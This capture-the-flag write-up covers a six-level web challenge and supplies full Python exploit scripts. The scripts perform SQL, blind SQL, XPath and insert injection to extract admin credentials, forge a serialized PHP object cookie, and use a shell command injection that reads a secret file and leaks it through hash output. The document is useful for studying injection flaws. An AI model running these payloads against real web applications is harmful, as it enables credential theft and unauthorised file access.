hxp CTF 2017: web150 "web_of_ages" writeup
web_of_ages consisted of six levels, all with one sort of injection exploit.
- Level 1: SQL injection
- Level 2: Blind SQL injection
- Level 3: XPath injection
- Level 4: Object injection
- Level 5: Insert injection
- Level 6: Command injection
Level 1
This level had basically no filter and a normal “print” statement, so all you needed to do was to select the username and password from the database. The username was especially easy, just circumvent the check with {"user":"???", "' OR 1=1 -- "}, the result was admin. To get the password we used UNION: {"user":"admin", "password":"' AND 0=1 UNION (SELECT password, password, password FROM auth WHERE username = '{}') -- "}.
Level 2
Here we had the same scenario as in Level 1, just blind. This meant that we had to adjust our exploit to just brute one char of each field after the other. The delicacy is to make sure to get upper- and lowercase correct here.
#! /usr/bin/python3.3
import argparse
from collections import OrderedDict
import re
import requests
url = "http://task02.webhacky1/tasks/injection2/auth2.php"
proxies = dict()
def send_request(fieldname, offset, number):
password = "' OR 1=1 AND ascii(substring((SELECT %(fieldname)s from auth limit 0,1),%(offset)s,1))>%(number)s ;#"
payload = {
'username': 'admin',
'password': password % {'fieldname': fieldname, 'offset': offset, 'number': number}
}
r = requests.post(url, data=payload)
return "alert alert-danger" not in r.text
def bruteforce_step(fieldname, offset, bottom, top):
if bottom == top:
print("\b"+chr(bottom), end="", flush=True)
return bottom
pivot = int((top-bottom)/2 + bottom)
print("\b"+chr(pivot), end="", flush=True)
if send_request(fieldname, offset, pivot):
# higher
return bruteforce_step(fieldname, offset, pivot+1, top)
else:
# lower
return bruteforce_step(fieldname, offset, bottom, pivot)
def bruteforce_characters():
login = OrderedDict([('username', ''), ('password', '')])
for fieldname in login:
offset = 1
while send_request(fieldname, offset, 0):
print(" ", end="")
character = chr(bruteforce_step(fieldname, offset, 0, 128))
login[fieldname] += character
offset += 1
print('') # newline
return login
def login(loginData):
payload = {
'username': loginData['username'],
'password': loginData['password']
}
r = requests.post(url, data=payload)
return r.text
def main():
loginData = bruteforce_characters()
response = login(loginData)
print(response)
if __name__ == "__main__":
main()
Level 3
Here we had a simple XPath injection, easy and without any filters in place. You can read more about the basics of an XPath injection in this OWASP article about it.
#! /usr/bin/python3.3
import string
import argparse
from collections import OrderedDict
import re
import requests
url = "http://URL:PORT/"
def send_request(user, password):
#password = "' or substring((//Accounts[position()=1]/child::node()[position()=1]),1,1)='%s' and ''='"
payload = {
'username': user,
'password': password
}
r = requests.post(url, data=payload)
return r.text
def login(loginData):
payload = {
'username': loginData['username'],
'password': loginData['password']
}
r = requests.post(url, data=payload)
return r.text
def main():
accountCount = 0
for c in range(20):
password = "' or count(../account)='%d' and ''='" % c
response = send_request('admin', password)
if "alert alert-danger" not in response:
accountCount = c
break
print("%d Accounts found" % accountCount)
for account in range(1, accountCount+1):
print("Account %d" % account)
loginData = OrderedDict([('username', ''), ('password', '')])
for fieldname in loginData:
length = 0
for i in range(50):
#password = "' or string-length(../child::node()[position()=1]/child::*[position()=3])='%d" % i
#password = "' or string-length(../account[position()=%d]/child::*[position()=%d])='%d" % (account, userpass, i)
password = "' or string-length(../account[position()=%d]/%s)='%d" % (account, fieldname, i)
response = send_request('admin', password)
if "alert alert-danger" not in response:
length = i
break
output = ''
for offset in range(length):
print(' ', end="")
for c in string.printable:
print("\b"+c, end="", flush=True)
#password = "' or substring(name(parent::*[position()=1]),%s,1)='%s" % (offset+1, c)
#password = "' or substring(./child::*[position()=3],%s,1)='%s" % (offset+1, c)
password = "' or substring(../account[position()=%d]/%s,%s,1)='%s" % (account, fieldname, offset+1, c)
response = send_request('admin', password)
if "alert alert-danger" not in response:
output += c
break
print('')
loginData[fieldname] = output
response = send_request(loginData['username'], loginData['password'])
print(response)
if __name__ == "__main__":
main()
Level 4
Now we have an object injection and the hint to look for the source in the repository. The repository was located in ./.git and could be downloaded with any tool of your choosing, e.g. this one.
The file contained classes.php
<?php
class user {
public $name = 'guest';
public $state = 'guest';
private $system;
public function __construct(){
$this->system = new core();
}
public function do_login($user, $password){
if($this->system->check_login_data($user, $password)){
$this->name = $user;
return true;
}
return false;
}
}
class core {
private $mode = 'productive';
protected $db;
public function __construct(){
$this->connect_to_db();
}
public function __wakeup(){
$this->connect_to_db();
}
private function connect_to_db(){
$this->db = new mysqli("localhost", "auth7", "jNu6bewP9uy7VCbs", "auth7");
}
public function check_login_data( $name, $password ){
$q = sprintf('SELECT * FROM auth7 WHERE name = "%s"', $this->db->real_escape_string($name));
$qres = $this->db->query($q);
if($qres->num_rows == 0)
return false;
$user = $qres->fetch_assoc();
if($this->mode === 'debug')
$this->dbg_info($user);
if($user['password'] == $password){
return true;
}
return false;
}
public function call_bin( $path ){
if($this->mode === 'debug')
$this->dbg_info( $path );
return passthru( $path );
}
public function eval_code( $code ){
if($this->mode === 'debug')
$this->dbg_info( $code );
ob_start();
eval($code);
$tmp = ob_get_clean();
return $tmp;
}
private function dbg_info( $data ){
printf('DEBUG %s: %s', date('H:i:s'), var_export($data, true));
}
}
?>
and index.php
if(isset($_COOKIE['user'])){
$user = unserialize(base64_decode($_COOKIE['user']));
} else {
$user = new user();
}
You needed to craft a custom cookie and set the $core->mode to debug, this would print the password out for you upon trying to login as admin the next time.
#! /usr/bin/python3.3
import string
import argparse
from collections import OrderedDict
import re
import requests
url = "http://URL:PORT/"
def send_request(user, password, cookies):
payload = {
'username': user,
'password': password
}
r = requests.post(url, data=payload, cookies=cookies)
return r.text
def main():
cookies = {'user': 'Tzo0OiJ1c2VyIjozOntzOjQ6Im5hbWUiO3M6NToiZ3Vlc3QiO3M6NToic3RhdGUiO3M6NToiZ3Vlc3QiO3M6MTI6IgB1c2VyAHN5c3RlbSI7Tzo0OiJjb3JlIjoyOntzOjEwOiIAY29yZQBtb2RlIjtzOjU6ImRlYnVnIjtzOjU6IgAqAGRiIjtPOjY6Im15c3FsaSI6MTk6e3M6MTM6ImFmZmVjdGVkX3Jvd3MiO047czoxMToiY2xpZW50X2luZm8iO047czoxNDoiY2xpZW50X3ZlcnNpb24iO047czoxMzoiY29ubmVjdF9lcnJubyI7TjtzOjEzOiJjb25uZWN0X2Vycm9yIjtOO3M6NToiZXJybm8iO047czo1OiJlcnJvciI7TjtzOjEwOiJlcnJvcl9saXN0IjtOO3M6MTE6ImZpZWxkX2NvdW50IjtOO3M6OToiaG9zdF9pbmZvIjtOO3M6NDoiaW5mbyI7TjtzOjk6Imluc2VydF9pZCI7TjtzOjExOiJzZXJ2ZXJfaW5mbyI7TjtzOjE0OiJzZXJ2ZXJfdmVyc2lvbiI7TjtzOjQ6InN0YXQiO047czo4OiJzcWxzdGF0ZSI7TjtzOjE2OiJwcm90b2NvbF92ZXJzaW9uIjtOO3M6OToidGhyZWFkX2lkIjtOO3M6MTM6Indhcm5pbmdfY291bnQiO047fX19'}
response = send_request('admin', 'dummy', cookies)
passwordPattern = re.compile("'password' \=\> '([\W\w]*?)'")
m = passwordPattern.search(response)
password = m.group(1)
print("Password: ", password)
cookies = {}
response = send_request('admin', password, cookies)
print(response)
if __name__ == "__main__":
main()
Level 5
Almost done, this time we have to fight an insert injection. You are presented with a login and registration page, but this time around the login is completely safe and the registration process is vulnerable.
After creating a dummy user and logging in you see that there is a status field in the table that you can use to extract data.
#!/usr/bin/python3.6
import sys, re
import requests
import random, string
def inject(txt):
for i in range(3):
username = "{}".format(''.join(random.choices(string.ascii_lowercase + string.digits, k=12)))
password = "u', ({})) -- ".format(txt)
if register_account(username, password):
payload = {'username': username, 'password': 'u'}
data = requests.post("http://IP:PORT/", data=payload).text
return re.findall("status is: ([^\s]*)", data, re.S)[0]
return False
def register_account(username, password):
payload = {'username': username, 'password': password}
data = requests.post("http://IP:PORT/?register", data=payload).text
return ("Registration was successful" in data)
def login(username, password):
payload = {'username': username, 'password': password}
data = requests.post("http://IP:PORT/", data=payload).text
return data
def get_admin_password():
query = "SELECT SUBSTRING(password, {},5) AS p FROM users AS u WHERE u.name = \"admin\" LIMIT 1"
password = ""
while True:
substr = inject(query.format(len(password)+1))
if substr and len(substr) > 0:
password = password + substr
if len(substr) < 5:
break
else:
break
return password
def main(args):
password = get_admin_password()
data = login("admin", password)
print(data)
if __name__ == "__main__":
main(sys.argv)
Level 6
Final level. This time we basically have “MD5 as a Service” and the command line injection gets pretty in your face since sending ; is simply refusing to be executed. The only tricky part is a check that looks like the output seems to be a valid md5, so we have to do some improvisation.
#!/usr/bin/python3
import sys, re
import requests
import random, string
ext_url = "http://IP:PORT/"
def get_page(txt = ""):
payload = {'str': txt}
return requests.get(ext_url, params=payload).text
def get_hash(data):
return re.findall('([0-9a-f]{32})', data, re.S)[0]
def main(args):
file = ""
query = "\\' | cat .htsecret | od -j {} -N 16 -A n -v -t x1 | tr -d ' \\n' # "
i = 0
while True:
data = get_page(query.format(i))
if "does not look" not in data and "seems like there was an error" not in data:
file = file + get_hash(data)
i = i + 16
else:
break
if len(file) > 0:
data = bytes.fromhex(file).decode('utf-8')
if len(data) > 0:
print(data.strip())
if __name__ == "__main__":
main(sys.argv)